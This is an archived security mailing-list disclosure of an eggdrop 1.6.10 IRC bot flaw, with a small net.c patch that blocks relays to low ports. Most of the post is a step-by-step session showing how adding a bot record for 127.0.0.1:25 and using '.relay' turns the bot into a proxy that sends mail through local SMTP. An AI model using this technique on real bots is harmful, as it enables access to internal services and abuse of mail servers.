Hi, there is a serious security problem in the popular eggdrop IRCbot. The hole allows a regular user with enough 'power' (at least power to add new bot records) to use any linked instance of the bot on the botnet as an instant 'proxy'. The following session demonstrates the problem with an out-of-the-box eggdrop 1.6.10: .+bot bighole 127.0.0.1:25 [20:23] #IhaQuer# +bot bighole 127.0.0.1:25 Added bot 'bighole' with address '127.0.0.1:25' and no password. You'll want to add a hostmask if this bot will ever be on any channels that I'm on. [20:23] #IhaQuer# match bighole *** Matching 'bighole': HANDLE PASS NOTES FLAGS LAST bighole no 0 b never (nowhere ) ADDRESS: 127.0.0.1 users: 25, bots: 25 --- Found 1 match. .relay bighole [20:23] #IhaQuer# relay bighole Connecting to bighole @ 127.0.0.1:25 ... (Type *BYE* on a line by itself to abort.) Success! NOW CONNECTED TO RELAY BOT bighole ... (You can type *BYE* to prematurely close the connection.) *** IhaQuer left the party line. 220 server.org ESMTP Postfix HELO blahblah.org 250 server.org MAIL from: blahblah.org 250 Ok rcpt to: ihaquerat_private 250 Ok data 354 End data with <CR><LF>.<CR><LF> blah blah . 250 Ok: queued as CFDFC2F012 Obviously an email has been sent by the local postfix bound to the loopback address 127.0.0.1! The impact may depend on the host the bot is running on, including tunneling into internal networks, accessing services bound to the loopback only, bypassing TCP wrappers etc, etc. There is no clean solution so far, for my own I decided to modify the net.c file and add something like: int open_telnet_raw(int sock, char *server, int sport) . . . name.sin_family = AF_INET; name.sin_port = htons(port); + if(port < 1024 && port != 113) { + putlog(LOG_MISC, "*", "WARNING attempt to connect to low port %s:%d", server, port); + return -1; + } Hope this helps, thanks to Maciek Kroenke for bringing my attention to this bug, /ih
This archive was generated by hypermail 2b30 : Mon Feb 10 2003 - 06:38:23 PST